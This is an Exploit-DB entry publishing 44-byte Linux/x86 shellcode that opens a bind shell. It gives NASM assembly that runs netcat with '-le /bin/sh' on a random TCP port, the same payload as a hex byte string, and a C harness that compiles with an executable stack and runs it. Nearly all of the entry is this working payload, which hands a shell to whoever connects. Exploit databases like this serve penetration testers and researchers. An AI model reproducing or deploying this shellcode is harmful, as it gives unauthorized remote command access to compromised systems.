Linux/x86 - Bind (Random TCP Port) Shell (/bin/sh) Shellcode (44 bytes)

EDB-ID:

41631

CVE:

N/A

EDB Verified:

Author:

Oleg Boytsev

Type:

shellcode

Exploit:   /  

Platform:

Linux_x86

Date:

2017-03-17

Vulnerable App: 
/*
# Super_Small_Bind_Shell 2 (x86)
# Date: 17.03.2017
# This shellcode will listen on random port and show you how deep the rabbit hole goes
# Please note that ports below 1024 require high privileges to bind!
# Shellcode Author: ALEH BOITSAU
# Shellcode Length: 44 bytes!) 
# Tested on: Debian GNU/Linux 8/x86_64
# Command: gcc -m32 -z execstack super_small_bind_shell2.c -o super_small_bind_shell2

section .text
global _start
 _start:

    xor edx, edx
    push edx
    push 0x68732f2f     ;-le//bin//sh
    push 0x6e69622f
    push 0x2f656c2d
    mov edi, esp

    push edx
    push 0x636e2f2f     ;/bin//nc
    push 0x6e69622f
    mov ebx, esp

    push edx
    push edi
    push ebx
    mov ecx, esp
    xor eax, eax
    mov al,11
    int 0x80 

*/

#include <stdio.h>
#include <string.h>

unsigned char shellcode[] =
"\x31\xd2\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x68\x2d\x6c\x65\x2f\x89\xe7\x52\x68\x2f\x2f\x6e\x63\x68\x2f\x62\x69\x6e\x89\xe3\x52\x57\x53\x89\xe1\x31\xc0\xb0\x0b\xcd\x80";
main()
{
	printf("Shellcode Length: %d\n",strlen(shellcode));
	int (*ret)() = (int(*)())shellcode;
	ret();
}
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services